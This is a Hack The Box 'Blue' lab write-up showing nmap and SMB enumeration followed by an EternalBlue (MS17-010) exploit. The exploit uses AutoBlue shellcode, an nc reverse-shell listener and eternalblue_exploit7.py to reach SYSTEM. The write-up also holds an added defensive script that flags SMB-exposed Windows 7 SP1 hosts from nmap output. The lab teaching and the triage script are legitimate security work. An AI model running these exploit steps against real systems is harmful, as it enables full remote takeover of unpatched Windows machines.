HacktheBox - Blue Writeup


Initial Enumeration

1. Nmap Scan

Let's start with a scan of the target ip address:

nmap -sC -sV -oA nmap/initial.tcp <target-ip>

From the nmap scan we see quite a few open ports for Windows RPC (the high dynamic ports), plus the more common ports 135, 139 and 445.

The scan also reveals a potential username that may be useful later: haris.

As SMB is really the only interesting service exposed on this machine, the way in will either be through SMB itself or via an EternalBlue exploit, since the scan tells us the machine is running Windows 7 SP1 (build 7601).
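The reasoning above (SMB reachable plus a Windows 7 SP1 build 7601 banner, therefore an MS17-010 candidate until patch state is confirmed) is the kind of check a defender wants to run across a whole scan rather than eyeball per host. The following Python script is an added example, not part of the original writeup and not from any tool the writeup uses: it parses the greppable output that `nmap -oA` writes (the `.gnmap` file) and produces triage findings. The sample scan lines and IP addresses are constructed, and the banner patterns it keys on (`Windows 7`, build `7601`) are an assumption taken from the writeup's own observation.

```python
"""Triage nmap greppable (.gnmap) output for hosts exposing SMB on a Windows 7 SP1 build.

Added example for this writeup; not the writeup's own tooling. Constructed
sample data is embedded so the script runs offline.
"""
import re
from dataclasses import dataclass

# Constructed sample in nmap greppable format (what `nmap -oA` writes to *.gnmap).
# The Ports field is: port/state/proto/owner/service/rpcinfo/version/
SAMPLE_GNMAP = (
    "# Nmap scan initiated as: nmap -sC -sV -oA nmap/initial.tcp 10.0.0.5\n"
    "Host: 10.0.0.5 ()\tStatus: Up\n"
    "Host: 10.0.0.5 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, "
    "445/open/tcp//microsoft-ds//Windows 7 Professional 7601 Service Pack 1 "
    "microsoft-ds (workgroup: WORKGROUP)/, "
    "49152/open/tcp//msrpc//Microsoft Windows RPC/\tIgnored State: filtered (991)\n"
    "Host: 10.0.0.6 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, "
    "445/open/tcp//microsoft-ds//Samba smbd 4.6.2/\n"
    "Host: 10.0.0.7 ()\tPorts: 80/open/tcp//http//nginx 1.18/\n"
    "# Nmap done\n"
)

SMB_PORTS = {139, 445}
# Assumption: a banner naming Windows 7 or build 7601 is treated as
# MS17-010-relevant until the patch state of the host has been verified.
EOL_WINDOWS = re.compile(r"Windows 7|\b7601\b", re.IGNORECASE)


@dataclass(frozen=True)
class Port:
    number: int
    state: str
    proto: str
    service: str
    version: str


@dataclass(frozen=True)
class Finding:
    host: str
    severity: str
    reason: str
    action: str


def parse_gnmap(text):
    """Return {host: [Port, ...]} parsed from greppable nmap output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment lines and anything else are ignored
        fields = line.split("\t")
        host = fields[0].split()[1]
        hosts.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue  # e.g. "Status: Up" or "Ignored State: ..."
            for entry in field[len("Ports: "):].split(", "):
                # Drop the trailing "/" and split into the seven sub-fields;
                # maxsplit keeps any "/" inside the version string intact.
                parts = entry.rstrip("/").split("/", 6)
                parts += [""] * (7 - len(parts))
                hosts[host].append(Port(int(parts[0]), parts[1], parts[2], parts[4], parts[6]))
    return hosts


def triage(text):
    """Flag hosts with SMB reachable; raise severity when the banner is a Windows 7 SP1 build."""
    findings = []
    for host, ports in parse_gnmap(text).items():
        smb = [p for p in ports if p.number in SMB_PORTS and p.state == "open"]
        if not smb:
            continue
        exposed = sorted(p.number for p in smb)
        banner = " ".join(p.version for p in smb).strip()
        if EOL_WINDOWS.search(banner):
            findings.append(Finding(
                host, "high",
                f"SMB reachable on {exposed} and banner reports a Windows 7 SP1 build: {banner!r}",
                "Verify the MS17-010 update is installed, disable SMBv1, and block 139/445 from untrusted networks",
            ))
        else:
            findings.append(Finding(
                host, "info",
                f"SMB reachable on {exposed}; banner {banner!r} gives no build evidence, verify patch level",
                "Restrict SMB to the networks that need it",
            ))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_GNMAP):
        print(f"[{f.severity}] {f.host}: {f.reason} -> {f.action}")
```

Pointing the script at a real `.gnmap` file is a matter of reading it into `triage()`; the useful part is that a build-7601 banner behind an open 445 is called out as a patch-verification item rather than left buried in the scan.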

2. SMB Enumeration 

We can use smbmap to determine if we have access to any network shares when trying to access them as an anonymous user. 

smbmap -H <target-ip> -u anonymous

As it turns out, we don't have access to any shares.

As I think the only other option to root this machine is via EternalBlue, let's look into it further and see if we can exploit it without using Metasploit.

3. Finding MS17-010 Eternalblue exploit 

As I have exploited EternalBlue before on other machines, I know that there is a reliable GitHub repository from @3ndG4me that automates the MS17-010 exploit for various Windows OS versions.


4. Exploiting MS17-010 with AutoBlue

Firstly, we need to clone the GitHub repo:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

Follow the steps shown in the README to create the shellcode needed for the exploit.

Below are the settings I used to create the shellcode for the exploit.

Once the shellcode script completes, several binary files are created. We will use the binary file called sc_all.bin.

Before we execute the file, we need to start a netcat listener to catch the connection from the machine. 

nc -lvnp 9000

We can now select the desired EternalBlue exploit. Because the target is a Windows 7 machine, we will use the eternalblue_exploit7.py script:

python eternalblue_exploit7.py shellcode/sc_all.bin

We now have a connection back on our netcat listener from the machine as SYSTEM! 

As we are SYSTEM, it means that we can grab both the user and root flags! 

user.txt was found in the user haris's desktop directory:

root.txt was found in the Administrator's desktop directory: